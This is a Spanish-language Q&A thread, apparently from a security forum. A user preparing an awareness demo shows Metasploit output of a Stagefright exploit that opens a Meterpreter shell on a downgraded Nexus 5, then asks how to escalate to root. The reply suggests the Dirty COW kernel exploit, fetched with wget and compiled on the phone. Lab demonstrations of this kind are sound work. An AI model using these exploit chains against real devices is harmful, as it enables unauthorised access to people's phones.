SELinux Privilege Escalation Metasploit Nexus 5 Android 5.0.1 LRX22C después de Stagefright

3

Estoy preparando una parte de un día de concienciación sobre seguridad y una parte del "programa" debe ser sobre la seguridad móvil. Pensé en mostrar el exploit stagefright .

Así que empecé con la adquisición de un teléfono móvil compatible con el último módulo stagefright en el marco de metasploit (Nexus 5), lo cambié a una versión con vulnerabilidad de stagefright (Android 5.0.1 LRX22C) y comencé a explotar.

Todo funciona bien:

[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Target selected: Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending HTML to 192.168.1.108:56616...<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.1.108:56616... (heap: 0x0, code: 0x0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Target selected: Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending HTML to 192.168.1.108:56616...<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.1.108:56616... (heap: 0xb3a2e980, code: 0x0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending RCE gzip'd MPEG4 (102053 bytes) to 192.168.1.108:56616... (heap: 0xb3a2e980, code: 0xb64f1cb0 from Browser)<br/>
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending RCE gzip'd MPEG4 (102048 bytes) to 192.168.1.108:58971... (heap: 0xb3a2e980, code: 0xb64f1cb0 from SF)<br/>
[*] Transmitting intermediate stager...(136 bytes)<br/>
[*] Sending stage (397164 bytes) to 192.168.1.108<br/>
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.108:44680) at 2017-02-19 05:19:51 -0500<br/>

Dentro de esta sesión, soy bastante de ayuda y sin derechos. Mi UID es 1013, que supongo que es el UID del servidor de medios. No tengo acceso a ningún directorio o archivo interesante (Sin acceso, sin efecto con mi programa). Impresionado, noté que este teléfono usa SELinux. Decidí preguntar a google sobre cómo obtener más privilegios y encontré esto: CVE-2015-3864 Metasploit Module de Mr. Drake aka jduck.

Utilizó algo de valor especialmente diseñado para obtener acceso de root dentro de este entorno SELinux. Pero debo admitir que esto es algo con lo que necesitaría algún consejo o ayuda. ¿Cómo construyo esas cargas útiles combinadas con Mettle, pingpong y iovyroot?
En pocas palabras: ¿Cómo obtengo más privilegios o incluso root en este teléfono para mostrar algo que toque a la audiencia?

Pregunta más precisa:
¿Cómo personalizo la carga útil para incluir las explotaciones PingPong-root y Iovy-root?
(Cualquier otra combinación de cargas útiles para obtener acceso de root también es bienvenida))

    
pregunta Agent H. 19.02.2017 - 11:54
fuente

1 respuesta

2

Utilice la vulnerabilidad del kernel Dirtycow . Supongo que con la rebaja que hiciste, el kernel es vulnerable a él.

También puede usarlo en los núcleos de Android: PoC de Android de la vaca sucia .

Un ejemplo de video al respecto: enlace

Una vez dentro del dispositivo, puedes descargarlo a través de wget o la vulnerabilidad y compilarlo para obtener root. Revisa tu kernel para ver si es vulnerable, supongo que lo es.

    
respondido por el OscarAkaElvis 19.02.2017 - 13:51
fuente

Lea otras preguntas en las etiquetas